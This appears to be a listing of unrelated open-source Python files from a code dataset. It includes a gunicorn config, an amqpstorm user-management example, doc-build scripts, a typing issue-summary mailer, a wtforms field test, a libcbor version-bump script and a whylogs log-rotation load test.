packages=['anna', ],
license='Apache v2',
long_description='Client for the Anna KVS',
install_requires=['zmq', 'protobuf'],
cmdclass={'install': InstallWrapper}
)
|
kqueen/gunicorn.py | LaudateCorpus1/kqueen | 140 | 12799761 | <filename>kqueen/gunicorn.py
from kqueen.config import current_config
from prometheus_client import multiprocess
import multiprocessing
import os
app_config = current_config()
bind = "{host}:{port}".format(
host=app_config.get('KQUEEN_HOST'),
port=app_config.get('KQUEEN_PORT'),
)
timeout = 180
workers = multiprocessing.cpu_count() * 2 + 1
worker_class = 'gthread'
# check for prometheus settings
if 'prometheus_multiproc_dir' not in os.environ:
raise Exception('Variable prometheus_multiproc_dir is required')
def child_exit(server, worker):
multiprocess.mark_process_dead(worker.pid)
|
examples/management/get_user.py | ZygusPatryk/amqpstorm | 140 | 12799812 | <gh_stars>100-1000
from amqpstorm import management
if __name__ == '__main__':
# If using a self-signed certificate, change verify=True to point at your CA bundle.
# You can disable certificate verification for testing by passing in verify=False.
API = management.ManagementApi('https://rmq.amqpstorm.io:15671', 'guest',
'guest', verify=True)
API.user.create('my_user', 'password')
# Get a user
print(API.user.get('my_user'))
# User that does not exist throws an exception
API.user.delete('my_user')
try:
API.user.get('NOT_FOUND')
except management.ApiError as why:
if why.error_code == 404:
print('User not found')
|
boost/libs/iterator/doc/generate.py | randolphwong/mcsema | 1,155 | 12799824 | <reponame>randolphwong/mcsema<filename>boost/libs/iterator/doc/generate.py
#!/usr/bin/python
# Copyright <NAME> 2004. Use, modification and distribution is
# subject to the Boost Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
#
# Generate html, TeX, and PDF versions of all the source files
#
import os
import sys
from syscmd import syscmd
from sources import sources
if 0:
for s in sources:
syscmd('boosthtml %s' % s)
else:
extensions = ('html', 'pdf')
if len(sys.argv) > 1:
extensions = sys.argv[1:]
all = [ '%s.%s' % (os.path.splitext(s)[0],ext)
for ext in extensions
for s in sources
]
print 'make %s' % ' '.join(all)
syscmd('make %s' % ' '.join(all))
|
dev/tools/docs/run_doctests.py | awillats/brian2 | 674 | 12799828 | <gh_stars>100-1000
import os
import sphinx
os.chdir('../../../docs_sphinx')
sphinx.main(['sphinx-build', '-b', 'doctest', '.', '../docs', '-D',
'exclude_patterns=reference'])
|
src/modules/catalog/domain/services.py | Ermlab/python-ddd | 308 | 12799846 | # from seedwork.domain.services import DomainService
# from seedwork.domain.value_objects import UUID
# from .entities import Listing, Seller
# from .repositories import ListingRepository
# from .rules import (
# ListingMustBeInDraftState,
# SellerMustBeEligibleForAddingNextListing,
# )
# class CatalogService:
# def publish_listing(self, listing: Listing, seller: Seller):
# self.check_rule(ListingMustBeInDraftState(listing.status))
# self.check_rule(SellerMustBeEligibleForAddingNextListing(seller))
# listing.publish()
|
vit/formatter/start_remaining.py | kinifwyne/vit | 179 | 12799856 | from vit.formatter.start import Start
class StartRemaining(Start):
def format_datetime(self, start, task):
return self.remaining(start)
|
scripts/typing-summary.py | AlexWaygood/typing | 1,145 | 12799864 | <gh_stars>1000+
#!/usr/bin/env python3
"""
Generate a summary of last week's issues tagged with "topic: feature".
The summary will include a list of new and changed issues and is sent each
Monday at 0200 CE(S)T to the typing-sig mailing list. Due to limitation
with GitHub Actions, the mail is sent from a private server, currently
maintained by @srittau.
"""
from __future__ import annotations
import datetime
from dataclasses import dataclass
from typing import Any, Iterable, Sequence
import requests
ISSUES_API_URL = "https://api.github.com/repos/python/typing/issues"
ISSUES_URL = "https://github.com/python/typing/issues?q=label%3A%22topic%3A+feature%22"
ISSUES_LABEL = "topic: feature"
SENDER_EMAIL = "Typing Bot <<EMAIL>>"
RECEIVER_EMAIL = "<EMAIL>"
@dataclass
class Issue:
number: int
title: str
url: str
created: datetime.datetime
user: str
pull_request: bool = False
def main() -> None:
since = previous_week_start()
issues = fetch_issues(since)
new, updated = split_issues(issues, since)
print_summary(since, new, updated)
def previous_week_start() -> datetime.date:
today = datetime.date.today()
return today - datetime.timedelta(days=today.weekday() + 7)
def fetch_issues(since: datetime.date) -> list[Issue]:
"""Return (new, updated) issues."""
j = requests.get(
ISSUES_API_URL,
params={
"labels": ISSUES_LABEL,
"since": f"{since:%Y-%m-%d}T00:00:00Z",
"per_page": "100",
"state": "open",
},
headers={"Accept": "application/vnd.github.v3+json"},
).json()
assert isinstance(j, list)
return [parse_issue(j_i) for j_i in j]
def parse_issue(j: Any) -> Issue:
number = j["number"]
title = j["title"]
url = j["html_url"]
created_at = datetime.datetime.fromisoformat(j["created_at"][:-1])
user = j["user"]["login"]
pull_request = "pull_request" in j
assert isinstance(number, int)
assert isinstance(title, str)
assert isinstance(url, str)
assert isinstance(user, str)
return Issue(number, title, url, created_at, user, pull_request)
def split_issues(
issues: Iterable[Issue], since: datetime.date
) -> tuple[list[Issue], list[Issue]]:
new = []
updated = []
for issue in issues:
if issue.created.date() >= since:
new.append(issue)
else:
updated.append(issue)
new.sort(key=lambda i: i.number)
updated.sort(key=lambda i: i.number)
return new, updated
def print_summary(
since: datetime.date, new: Sequence[Issue], changed: Sequence[Issue]
) -> None:
print(f"From: {SENDER_EMAIL}")
print(f"To: {RECEIVER_EMAIL}")
print(f"Subject: Opened and changed typing issues week {since:%G-W%V}")
print()
print(generate_mail(new, changed))
def generate_mail(new: Sequence[Issue], changed: Sequence[Issue]) -> str:
if len(new) == 0 and len(changed) == 0:
s = (
"No issues or pull requests with the label 'topic: feature' were opened\n"
"or updated last week in the typing repository on GitHub.\n\n"
)
else:
s = (
"The following is an overview of all issues and pull requests in the\n"
"typing repository on GitHub with the label 'topic: feature'\n"
"that were opened or updated last week, excluding closed issues.\n\n"
"---------------------------------------------------\n\n"
)
if len(new) > 0:
s += "The following issues and pull requests were opened last week: \n\n"
s += "".join(generate_issue_text(issue) for issue in new)
s += "\n---------------------------------------------------\n\n"
if len(changed) > 0:
s += "The following issues and pull requests were updated last week: \n\n"
s += "".join(generate_issue_text(issue) for issue in changed)
s += "\n---------------------------------------------------\n\n"
s += (
"All issues and pull requests with the label 'topic: feature'\n"
"can be viewed under the following URL:\n\n"
)
s += ISSUES_URL
return s
def generate_issue_text(issue: Issue) -> str:
s = f"#{issue.number:<5} "
if issue.pull_request:
s += "[PR] "
s += f"{issue.title}\n"
s += f" opened by @{issue.user}\n"
s += f" {issue.url}\n"
return s
if __name__ == "__main__":
main()
|
tests/fields/test_integer.py | Ennkua/wtforms | 1,197 | 12799900 | from tests.common import DummyPostData
from wtforms.fields import IntegerField
from wtforms.form import Form
class F(Form):
a = IntegerField()
b = IntegerField(default=48)
def test_integer_field():
form = F(DummyPostData(a=["v"], b=["-15"]))
assert form.a.data is None
assert form.a.raw_data == ["v"]
assert form.a() == """<input id="a" name="a" type="number" value="v">"""
assert form.b.data == -15
assert form.b() == """<input id="b" name="b" type="number" value="-15">"""
assert not form.a.validate(form)
assert form.b.validate(form)
form = F(DummyPostData(a=[], b=[""]))
assert form.a.data is None
assert form.a.raw_data == []
assert form.b.data is None
assert form.b.raw_data == [""]
assert not form.validate()
assert len(form.b.process_errors) == 1
assert len(form.b.errors) == 1
form = F(b=9)
assert form.b.data == 9
assert form.a._value() == ""
assert form.b._value() == "9"
form = F(DummyPostData(), data=dict(b="v"))
assert form.b.data is None
assert form.a._value() == ""
assert form.b._value() == ""
assert not form.validate()
assert len(form.b.process_errors) == 1
assert len(form.b.errors) == 1
|
misc/update_version.py | andyjgf/libcbor | 283 | 12799909 | import sys, re
from datetime import date
version = sys.argv[1]
release_date = date.today().strftime('%Y-%m-%d')
major, minor, patch = version.split('.')
def replace(file_path, pattern, replacement):
updated = re.sub(pattern, replacement, open(file_path).read())
with open(file_path, 'w') as f:
f.write(updated)
# Update changelog
SEP = '---------------------'
NEXT = f'Next\n{SEP}'
changelog_header = f'{NEXT}\n\n{version} ({release_date})\n{SEP}'
replace('CHANGELOG.md', NEXT, changelog_header)
# Update Doxyfile
DOXY_VERSION = 'PROJECT_NUMBER = '
replace('Doxyfile', DOXY_VERSION + '.*', DOXY_VERSION + version)
# Update CMakeLists.txt
replace('CMakeLists.txt',
'''SET\\(CBOR_VERSION_MAJOR "0"\\)
SET\\(CBOR_VERSION_MINOR "7"\\)
SET\\(CBOR_VERSION_PATCH "0"\\)''',
f'''SET(CBOR_VERSION_MAJOR "{major}")
SET(CBOR_VERSION_MINOR "{minor}")
SET(CBOR_VERSION_PATCH "{patch}")''')
# Update Sphinx
replace('doc/source/conf.py',
"""version = '.*'
release = '.*'""",
f"""version = '{major}.{minor}'
release = '{major}.{minor}.{patch}'""")
|
tests/component/test_performance_log_dataframe.py | cswarth/whylogs | 603 | 12799916 | <filename>tests/component/test_performance_log_dataframe.py
import cProfile
import json
import os
import pstats
from logging import getLogger
from shutil import rmtree
from time import sleep
from typing import List
import pandas as pd
import pytest
from whylogs.app.config import SessionConfig, WriterConfig
from whylogs.app.session import session_from_config
script_dir = os.path.dirname(os.path.realpath(__file__))
TEST_LOGGER = getLogger(__name__)
def count_features(json_profile_filename):
if not os.path.isfile(json_profile_filename):
raise ValueError(f"{json_profile_filename} is not a json file but trying to open it to count features")
profile = get_json_profile(json_profile_filename)
if profile and profile.get("columns"):
return len(profile["columns"].keys())
return 0
def get_json_profile(json_profile_filename):
profile = {}
if os.path.exists(json_profile_filename) and os.stat(json_profile_filename).st_size > 0:
with open(json_profile_filename) as profile_file:
profile = json.load(profile_file)
return profile
def assert_all_elements_equal(data: List):
if not data or len(data) == 1:
return True
first = data[0]
for element in iter(data):
assert first[0] == element[0], f"Found differing feature counts: {first[0]} vs {element[0]} in files {first[1]} and {element[1]}"
@pytest.mark.load
def test_log_rotation_concurrency(tmpdir):
log_rotation_interval = "1s"
sleep_interval = 2
test_path = tmpdir.mkdir("log_rotation_concurrency_repro")
writer_config = WriterConfig("local", ["json"], test_path.realpath(), filename_template="dataset_summary-$dataset_timestamp")
# Load the full lending club 1000 csv, to get a chance at hitting the bug.
csv_path = os.path.join(script_dir, "lending_club_1000.csv")
full_df = pd.read_csv(csv_path)
# full_df has shape (1000, 151) so create a test df with 4x size by iteratively appending to self 2 times
for _ in range(2):
full_df = full_df.append(full_df)
TEST_LOGGER.info(f"test dataframe has shape {full_df.shape}")
# Create a whylogs logging session
session_config = SessionConfig("project", "pipeline", writers=[writer_config])
session = session_from_config(session_config)
TEST_LOGGER.info(f"Running rotate log test with {log_rotation_interval} flush intervals and {sleep_interval}s pause")
profiler = cProfile.Profile()
profiler.enable()
with session.logger(tags={"datasetId": "model-1"}, with_rotation_time=log_rotation_interval) as ylog:
ylog.log_dataframe(full_df) # Log a larger dataframe to increase chance of rotation before seeing all columns
sleep(sleep_interval)
ylog.log_dataframe(full_df.head(n=2)) # Log a smaller dataframe to get more features before rotation
sleep(sleep_interval)
profiler.disable()
stats = pstats.Stats(profiler).sort_stats("cumulative")
TEST_LOGGER.info(stats.print_stats(10))
output_files = []
for root, subdir, file_names in os.walk(test_path):
if not file_names:
continue
if subdir:
for directory in subdir:
for file in file_names:
full_file_path = os.path.join(root, directory, file)
output_files += [full_file_path]
else:
for file in file_names:
full_file_path = os.path.join(root, file)
output_files += [full_file_path]
assert len(output_files) > 0, "No output files were generated during stress test"
TEST_LOGGER.debug(f"Generated {len(output_files)} dataset summary files.")
feature_counts = []
for filename in output_files:
feature_count = count_features(filename)
if feature_count > 0:
feature_counts.append((count_features(filename), filename))
assert len(feature_counts) > 0, f"feature counts are all empty, we expect some empty files with aggressive log rotation but not all empty!"
TEST_LOGGER.info(f"Feature counts all same, first file with features was {feature_counts[0]}")
TEST_LOGGER.debug(f"There were {len(feature_counts)} files with features.")
assert_all_elements_equal(feature_counts)
rmtree(test_path, ignore_errors=True)
TEST_LOGGER.debug(f"End cleaning up test directory {test_path}")
|
Subsets and Splits